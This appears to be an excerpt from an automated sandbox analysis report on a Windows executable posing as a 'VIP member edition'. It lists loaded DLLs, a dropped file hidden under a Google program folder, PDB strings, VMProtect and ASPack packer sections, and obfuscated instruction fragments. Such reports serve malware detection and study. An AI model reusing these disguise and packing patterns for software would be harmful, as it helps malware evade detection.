      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: ntshrui.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: cscapi.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Section loaded: netutils.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: apphelp.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: msimg32.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: oledlg.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: wininet.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: uxtheme.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: windows.storage.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: wldp.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: profapi.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: propsys.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: windowscodecs.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: policymanager.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: msvcp110_win.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: napinsp.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: pnrpnsp.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: wshbth.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: nlaapi.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: iphlpapi.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: mswsock.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: dnsapi.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: winrnr.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: sspicli.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: iertutil.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: ieframe.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: netapi32.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: version.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: userenv.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: winhttp.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: wkscli.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: netutils.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: dataexchange.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: d3d11.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: dcomp.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: dxgi.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: twinapi.appcore.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: urlmon.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: srvcli.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: msiso.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: mshtml.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: powrprof.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: umpdc.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: cryptbase.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: profext.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: ntmarta.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: secur32.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: mlang.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: srpapi.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: textshaping.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: msimtf.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: msls31.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: d2d1.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: dwrite.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: resourcepolicyclient.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: d3d10warp.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: dxcore.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: wsock32.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: msxml3.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: winnsi.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: rasadhlp.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: fwpuclnt.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: textinputframework.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: coreuicomponents.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: coremessaging.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: coremessaging.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: wintypes.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: wintypes.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: wintypes.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: winmm.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: uiautomationcore.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: jscript9.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Section loaded: fltlib.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File written: C:\Users\user\Desktop\CFA702\D2EDCA7E\C8C6753\D74384.ini
      Source: VIP-#U4f1a#U5458#U7248.exe | Static file information: File size 21878788 > 1048576
      Source: VIP-#U4f1a#U5458#U7248.exe | Static PE information: Raw size of .data31 is bigger than: 0x100000 < 0x14d8c00
      Source: VIP-#U4f1a#U5458#U7248.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: G:\projects\funny\GamePluginCtrl\Release\gamePluginCtrl.pdb source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2098003349.0000000005650000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2110668560.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117568141.000000000564E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2106887093.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2097391603.0000000005635000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2124972973.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125866187.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2110514398.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2106102550.0000000005650000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125707363.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2100380408.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2110292883.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117790220.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2100550998.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2106586251.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmp, A2F0jleks.dll.2.dr
      Source: Binary string: \bin\xkSHWL.pdb source: D74384FB8D2C9.exe, 00000002.00000003.2125803402.0000000005649000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125707363.0000000005647000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125941640.0000000005649000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125803402.0000000005635000.00000004.00000020.00020000.00000000.sdmp, E875FIB50.dll.2.dr
      Source: Binary string: DPK\bin\dlq.pdb source: D74384FB8D2C9.exe, 00000002.00000003.2124316210.0000000005635000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2124316210.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 5801srmps.dll.2.dr
      Source: Binary string: DPK\bin\DPK.pdbL source: FC14NMPKD.dll.2.dr
      Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb @ source: D74384FB8D2C9.exe, 00000002.00000003.2117661174.0000000005638000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118239113.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117661174.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118127196.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118216832.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118035942.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118016119.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117790220.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117907299.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117731532.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117995127.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118264440.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117568141.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 4509OKKGD.dll.2.dr, 21AAtnoki.dll.2.dr, 346DgjhcV.dll.2.dr
      Source: Binary string: DPK\bin\DPK.pdb source: FC14NMPKD.dll.2.dr
      Source: Binary string: DPK\bin\JDClient.pdb source: 8FD7ijlhc.exe.2.dr
      Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb source: D74384FB8D2C9.exe, 00000002.00000003.2117661174.0000000005638000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118239113.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117661174.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118127196.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118216832.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118035942.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118016119.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117790220.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117907299.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117731532.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117995127.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118264440.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117568141.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 4509OKKGD.dll.2.dr, 21AAtnoki.dll.2.dr, 346DgjhcV.dll.2.dr

      Data Obfuscation

      Source: F977IID54.dll.2.dr | Static PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: F04bWTUR.dll.2.dr | Static PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: 5B38DA6A8.dll.2.dr | Static PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: E875FIB50.dll.2.dr | Static PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6D8340 ReadProcessMemory,LoadLibraryA,GetProcAddress,ReadProcessMemory,FreeLibrary
      Source: initial sample | Static PE information: section where entry point is pointing to: .data31
      Source: VIP-#U4f1a#U5458#U7248.exe | Static PE information: section name: .data30
      Source: VIP-#U4f1a#U5458#U7248.exe | Static PE information: section name: .data31
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 0DE
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 1TA
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 2S
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 3data
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 4ls
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 5data
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 6eloc
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 7src
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 8ext
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 9data
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 10ta
      Source: VIP-#U4f1a#U5458#U7248.exe.2.dr | Static PE information: section name: .data30
      Source: VIP-#U4f1a#U5458#U7248.exe.2.dr | Static PE information: section name: .data31
      Source: 22FD558C8.sys.2.dr | Static PE information: section name: .spa0
      Source: 22FD558C8.sys.2.dr | Static PE information: section name: .spa1
      Source: D74384F.sys.2.dr | Static PE information: section name: .spa0
      Source: D74384F.sys.2.dr | Static PE information: section name: .spa1
      Source: FC14NMPKD.dll.2.dr | Static PE information: section name: .vmp0
      Source: E816IBB62.dll.2.dr | Static PE information: section name: .vmp0
      Source: F977IID54.dll.2.dr | Static PE information: section name: .vmp0
      Source: F977IID54.dll.2.dr | Static PE information: section name: .vmp1
      Source: F04bWTUR.dll.2.dr | Static PE information: section name: .vmp0
      Source: F04bWTUR.dll.2.dr | Static PE information: section name: .vmp1
      Source: 8FD7ijlhc.exe.2.dr | Static PE information: section name: .vmp0
      Source: 8FD7ijlhc.exe.2.dr | Static PE information: section name: .vmp1
      Source: 5B38DA6A8.dll.2.dr | Static PE information: section name: .vmp0
      Source: 5B38DA6A8.dll.2.dr | Static PE information: section name: .vmp1
      Source: C945E611y.dll.2.dr | Static PE information: section name: .didata
      Source: C945E611y.dll.2.dr | Static PE information: section name: .aspack
      Source: C945E611y.dll.2.dr | Static PE information: section name: .adata
      Source: A2F0jleks.dll.2.dr | Static PE information: section name: .vvvt0
      Source: A2F0jleks.dll.2.dr | Static PE information: section name: .vvvt1
      Source: D5AESTNHE.dll.2.dr | Static PE information: section name: .vmp0
      Source: 5801srmps.dll.2.dr | Static PE information: section name: .vmp0
      Source: 5801srmps.dll.2.dr | Static PE information: section name: .vmp1
      Source: E875FIB50.dll.2.dr | Static PE information: section name: .vmp0
      Source: E875FIB50.dll.2.dr | Static PE information: section name: .vmp1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BF42BCB push dword ptr [esp+44h]; retn 0048h 2_2_0BF42BE1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BF08BA1 pushfd ; mov dword ptr [esp], D85E82B4h 2_2_0BF08BA9
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEEAA94 pushfd ; mov dword ptr [esp], edi 2_2_0BEEAAA4
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0C0A0D91 pushfd ; mov dword ptr [esp], edi 2_2_0C0A1BD1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0C0A8DBD push dword ptr [esp+10h]; retn 001Ch 2_2_0C0A8DE3
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEB2A0C push 0BEB2C90h; ret 2_2_0BEB2C88
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEA09A4 push 0BEA0DF0h; ret 2_2_0BEA0DE8
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BFAA880 push dword ptr [esp+1Ch]; retn 0020h 2_2_0BFAA891
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BF0887D push dword ptr [esp+14h]; retn 0018h 2_2_0BF0889A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0C0AA80D push dword ptr [esp+30h]; retn 0034h 2_2_0C0AA81B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEB0F88 push ecx; mov dword ptr [esp], edx 2_2_0BEB0F8D
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEA0E6C push 0BEA0EA0h; ret 2_2_0BEA0E98
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BFF0E4D pushfd ; mov dword ptr [esp], edi 2_2_0C0A1BD1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEA0DF2 push 0BEA0E63h; ret 2_2_0BEA0E5B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BE96DC0 push 0BE96E11h; ret 2_2_0BE96E09
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BF74D8C push dword ptr [esp+34h]; retn 0038h 2_2_0BF74DD4
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BFA8CFD push dword ptr [esp+34h]; retn 0038h 2_2_0BFA8D4D
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEF0384 push ebp; mov dword ptr [esp], BD2EF39Fh 2_2_0BF4B823
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEAC320 push ecx; mov dword ptr [esp], ecx 2_2_0BEAC325
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BE9A2EC push 0BE9A608h; ret 2_2_0BE9A600
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEAA2E0 push ecx; mov dword ptr [esp], edx 2_2_0BEAA2E5
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BE9A28C push 0BE9A2C9h; ret 2_2_0BE9A2C1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEAA29C push ecx; mov dword ptr [esp], edx 2_2_0BEAA2A1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEB224A push 0BEB2278h; ret 2_2_0BEB2270
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEB2202 push 0BEB2230h; ret 2_2_0BEB2228
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEAA180 push ecx; mov dword ptr [esp], edx 2_2_0BEAA185
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEEA16E pushfd ; mov dword ptr [esp], esi 2_2_0BEEA14A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEEA16E push edi; mov dword ptr [esp], ebp 2_2_0BEEB84A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BEEA0D4 pushad ; mov dword ptr [esp], C151F597h 2_2_0BF35F47
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BF580AB push dword ptr [esp+18h]; retn 001Ch 2_2_0BF580BD
